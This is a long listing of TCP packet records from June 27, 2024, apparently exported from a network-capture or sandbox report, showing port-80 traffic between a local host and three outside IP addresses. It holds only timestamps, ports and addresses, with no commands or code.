                                                                Jun 27, 2024 05:58:18.760154009 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.760159969 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.760178089 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.760202885 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.760273933 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.760284901 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.760296106 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.760314941 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.760348082 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:21.474940062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:21.475056887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:22.665277958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:22.666490078 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:03.180577993 CEST4972880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:03.185421944 CEST8049728147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:03.185525894 CEST4972880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:03.185729980 CEST4972880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:03.190516949 CEST8049728147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:03.861252069 CEST8049728147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:03.861349106 CEST4972880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:03.862163067 CEST4972880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:03.867561102 CEST8049728147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:04.072777033 CEST8049728147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:04.073563099 CEST4972880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:04.076463938 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.083333969 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.085324049 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.085410118 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.090100050 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.792975903 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.792992115 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.793004036 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.793020010 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.793030024 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.793040991 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.793071032 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.793104887 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.793116093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.793127060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.793143988 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.793174982 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.793262959 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.793273926 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.793313026 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.797903061 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.797915936 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.797926903 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.797971010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.797986984 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.917139053 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.917156935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.917171955 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.917222023 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.917237997 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.917253971 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.917301893 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.917367935 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.917699099 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.917756081 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.917788982 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.917804003 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.917840958 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.918093920 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918108940 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918148994 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.918169975 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918180943 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.918194056 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918215990 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.918237925 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.918687105 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918700933 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918715954 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918740034 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.918755054 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.918788910 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918803930 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918818951 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.918833017 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.918868065 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.919809103 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.919833899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.919848919 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.919858932 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.919878960 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.919898987 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.919956923 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.920005083 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.922139883 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.922164917 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.922180891 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:04.922190905 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.922218084 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:04.922230005 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040543079 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040575027 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040590048 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040605068 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040647984 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040662050 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040687084 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040700912 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040716887 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040716887 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040716887 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040745020 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040745020 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040764093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040788889 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040803909 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040812016 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040834904 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040853977 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040904045 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040920973 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040935993 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.040947914 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040987015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.040987015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041101933 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041116953 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041153908 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041306019 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041321039 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041328907 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041382074 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041419983 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041435957 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041465998 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041496038 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041541100 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041554928 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041570902 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041583061 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041605949 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041631937 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041857958 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041907072 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041918039 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041933060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.041968107 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.041980982 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042025089 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042048931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042062998 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042073965 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042100906 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042109966 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042357922 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042371988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042387009 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042409897 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042434931 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042473078 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042488098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042501926 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042519093 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042531013 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042542934 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042570114 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042686939 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042701960 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042716026 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042742968 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042772055 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042840958 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042856932 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.042890072 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.042905092 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.043175936 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.043199062 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.043224096 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.043231010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.043243885 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.043266058 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.043370962 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.043385029 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.043399096 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.043416977 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.043425083 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.043443918 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.043478012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.045737028 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.045753956 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.045809031 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.162661076 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.162676096 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.162740946 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.162794113 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.162849903 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.162866116 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.162930012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.162930012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.162930012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.162930012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.162976980 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.162997961 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163028002 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163049936 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163124084 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163137913 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163151979 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163166046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163177967 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163189888 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163201094 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163245916 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163373947 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163388968 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163403034 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163415909 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163427114 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163444042 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163464069 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163476944 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163486958 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163635969 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163650036 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163665056 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163677931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163687944 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163702965 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163723946 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163737059 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163842916 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163862944 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.163887978 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.163913012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164045095 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164058924 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164073944 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164089918 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164096117 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164112091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164119005 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164139032 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164146900 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164161921 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164170027 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164191008 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164206982 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164402962 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164417028 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164431095 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164444923 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164455891 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164473057 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164479971 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164503098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164510012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164521933 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164530993 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164544106 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164552927 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164570093 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164580107 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164587975 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164618969 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.164958000 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164973021 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.164987087 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165002108 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165011883 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165023088 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165035009 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165055037 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165081978 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165127039 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165148973 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165163040 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165172100 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165184975 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165194988 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165210009 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165216923 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165229082 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165240049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165257931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165266037 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165282011 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165287971 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165301085 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165309906 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165319920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165332079 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165347099 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165354013 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165369034 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165379047 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165390968 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165401936 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.165412903 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.165441036 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.168545961 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168560982 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168575048 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168596983 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.168612957 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.168675900 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168689013 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168703079 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168715954 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.168750048 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.168773890 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168788910 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168802977 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168817043 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.168853998 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.168936968 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168951035 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168966055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.168979883 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.168988943 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169003010 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169028997 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169058084 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169151068 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169166088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169178963 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169192076 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169202089 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169212103 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169225931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169239998 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169270992 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169351101 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169365883 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169399023 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169409037 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169445038 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169461012 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169492960 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169504881 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169524908 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169538975 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169552088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169567108 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169574976 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.169585943 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.169624090 CEST4972980192.168.2.677.91.77.81
